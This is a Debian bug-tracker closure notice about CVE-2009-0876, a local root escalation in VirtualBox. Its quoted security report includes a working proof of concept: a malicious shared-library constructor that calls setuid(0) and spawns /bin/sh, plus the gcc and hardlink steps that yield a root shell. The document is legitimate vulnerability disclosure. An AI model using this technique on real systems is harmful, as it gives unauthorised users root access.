Your message dated Tue, 17 Mar 2009 17:48:57 +0100
with message-id <[email protected]>
and subject line Re: [Pkg-virtualbox-devel] Bug#520126: virtualbox-ose:
CVE-2009-0876
has caused the Debian Bug report #520126,
regarding virtualbox-ose: CVE-2009-0876 insecure shared lib loading leads to
local privilege escalation
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
520126: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=520126
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: virtualbox-ose
Version: 2.1.4-dfsg-1
Severity: critical
Tags: security patch
Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for virtualbox-ose.
CVE-2009-0876[0]:
| Unspecified vulnerability in Sun xVM VirtualBox 2.0.0, 2.0.2, 2.0.4,
| 2.0.6r39760, 2.1.0, 2.1.2, and 2.1.4r42893 on Linux allows local users
| to gain privileges via unknown vectors related to "certain packages."
Quoting SpanKY <[email protected]>:
"hardlinks on Linux preserve permission, including set*id bits, and can be
created by non-root users. virtualbox attempts to perform some sanity checks on
the dir the binary exists in (presumably to prevent privilege escalation),
however that is done after the constructors in shared libs are run. that means
any library a virtualbox binary links against is an attack vector.
the constructor isnt the only attack vector ... you could also override any of
the standard C library functions that virtualbox would call during its startup.
like open() or stat() or ...
there really isnt many workarounds available here if DT_RPATH:$ORIGIN is
continued to be used. perhaps making a small dedicated partition (loopback or
whatever) and storing the binaries on there because hardlinks cannot go across
partitions.
simple example:
$ id -u
1002
$ cat test.c
#include <unistd.h>
#include <sys/syscall.h>
__attribute__((constructor))
void awesome(void)
{
char *argv[] = { "sh", NULL };
extern char *environ;
syscall(SYS_setuid, 0);
syscall(SYS_execve, "/bin/sh", argv, environ);
}
$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2
$ ls -l /opt/VirtualBox/VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox
$ ln /opt/VirtualBox/VirtualBox
$ ls -l VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox
$ ./VirtualBox
./VirtualBox: /home/vapier/libdl.so.2: no version information available
(required by ./VirtualBox)
sh-4.0# whoami
root"
Upstream patches are available on:
http://www.virtualbox.org/changeset/17171
http://www.virtualbox.org/changeset/17169
http://www.virtualbox.org/changeset/17168
Debian lenny is not affected by this problem as the binaries are not setuid 0.
If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.
For further information see:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0876
http://security-tracker.debian.net/tracker/CVE-2009-0876
--
Nico Golde - http://www.ngolde.de - [email protected] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
pgpfUThTBxQQK.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
On Tue, Mar 17, 2009 at 04:19:51PM +0100, Nico Golde wrote:
> Tags: security patch
> ...
Our version 2.1.4-dfsg-1 is not vulnerable. This topic was discussed with
upstream prior releasing that version.
Michael
--
Michael Meskes
Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
Michael at BorussiaFan dot De, Meskes at (Debian|Postgresql) dot Org
ICQ: 179140304, AIM/Yahoo: michaelmeskes, Jabber: [email protected]
Go VfL Borussia! Go SF 49ers! Use Debian GNU/Linux! Use PostgreSQL!
signature.asc
Description: Digital signature
--- End Message ---
